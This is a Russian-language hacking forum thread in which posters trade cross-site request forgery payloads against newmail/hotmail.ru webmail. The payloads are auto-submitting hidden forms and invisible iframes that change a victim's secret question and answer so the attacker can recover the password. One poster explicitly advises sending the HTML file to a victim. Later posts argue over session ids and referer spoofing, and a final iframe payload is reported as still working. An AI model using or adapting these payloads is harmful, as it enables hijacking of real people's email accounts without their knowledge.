newmаil

Вот, правильно списал? Только вот не работает.. Отправлял html`om и не работает =( может ошибка где?

[1]
<form method="post" action="http://www4.сервант.ru/users/chpass.dhtml" name="chpass">
<<input tupe="hidden" name="cp_msg" value="1">
<input tupe"hidden" name="__post" vbalue="1">
<input tupe"hidden" name="cp_quest" vbalue="LOX?">
<input tupe"hidden" name="cp_answ" vbalue="YES">
<input tupe"hidden" name="Сохранить" vbalue="Save">
</form>
<script>
document.chpass.submit();
</script>

[2]
<iframe src="http://www.chip.narod.ru/popa.htm" width="1" height="1"
style="overflow;hidden;background-color;black;border;none;" framebordar="0"></iframe>

 

У меня тоже не работает(
Он чето не то написал!

 

Можно сделать так:
<iframe src="http://www.fuc-321.narod.ru/fuck.htm" width="11" height="11"
style="overflow:hidden;background-color:blank;border:none;" frameborder="0"></iframe>
lololo
- этот код сохраняй в html документе и посылай его жертве, ответ на секретный вопросс будит : ta

 

Почему "ta"? Ведь я сам задаю в первом коде? Непонял малек. может дырку зашили просто?

 

И это у тебя работало? Откуда "ta" взялось?

 

форма такая :

Code:

<FORM ACTION="http://www4.hotmail.ru/users/chpass.dhtml?" METHOD="POST">

<input type="hidden" name="session_id" value="QsaA1RKVEa8jAGPpgbw02i1K4skiTnLb">
<input type="hidden" name="cp_msg" value="1">
<input type="hidden" name="__post" value="1">

<input type="password" name="cp_passwd" value="" maxlength="16" size="17">



<input type="password" name="cp_newpass" value="" maxlength="16" size="17">
<input type="password" name="cp_newpass2" value="" maxlength="16" size="17">

<input type="submit" value="Внести изменения">



<input type="text" name="cp_quest" maxlength="40" size="33" value="vopros">
<input type="text" name="cp_answ"  maxlength="24" size="25" value="otvet">
<input type="submit" value="Внести изменения" >

</FORM>

Причём все параметры обязательны, ктому же в форме пристутствует id сесии => надо писать скрипт например на php, который его вырезает из referer

 

Потому что 1 код находиться здесь: http://www.fuc-321.narod.ru/fuck.htm
Тпам вопросс: tata?
и ответ: ta

 

А, теперь понял. Я не обратил внимания ны ссылку.

 

Майор кто тебе сказал что все параметры обязательны, ты сам проверял? Сессия не нужна

 

Да, нужна!

 

А с чего ты взял, что ее можно вытащить из реферера?

 

Майор категорично.. Ты слишком поспешно делаешь из всего выводы, поэтому получается неправильно.
http://antichat.ru/txt/hmail здесь есть описание newmail, до сих пор работает.

 

Chin нет ни каких затруднений в получнеии реферера, значит и сессии

 

Если конечно в браузере не выключить поддержку реферера. В опере по-крайней мере такая возможность есть (правда по дефолту реф включен ).

 

может быть. я считаю это крайности. Есть и всякие программы которые подделывают рефер
проксимитрон, А4прокси и тд

 

от того что я проверил 3 раз id не перестал быть нужен...
PS Кстате там влюбом случае пишется что вопрос успешно изменён - это баг, на самом деле он не меняется

 

я вобще не понимаю твоей логики. что значит "там влюбом случае пишется что вопрос успешно изменён ". Было бы понятно, если для смены ответа требовался пароль, а ты вводишь без пароля и тебе пишут что вопрос успешно изменен, а на самом деле это не так. Только что попробовал, все по-прежнему работает. Зайди на главную, нажми "забыли пароль?" и там будет новый вопрос. когда введешь новый ответ тебе на ящик придет пароль

 

Вообщем идеальным выходом для newmail`а по-моему является

<iframe src=http://newmail.ru/users/chpass.dhtml?cp_msg=1&cp_quest=ВОПРОС&cp_answ=ОТВЕТ width=0 height=0></iframe>
© http://antichat.ru/txt/hmail

Ведь даже, если у юзера выключена графика, звуки или (не дай бог) javascript, то iframe помоему ну никак нельзя выключить.

 

чесно говоря я в недоумении, ты сам то пробовал ?

 

Конечно пробовал. И не раз.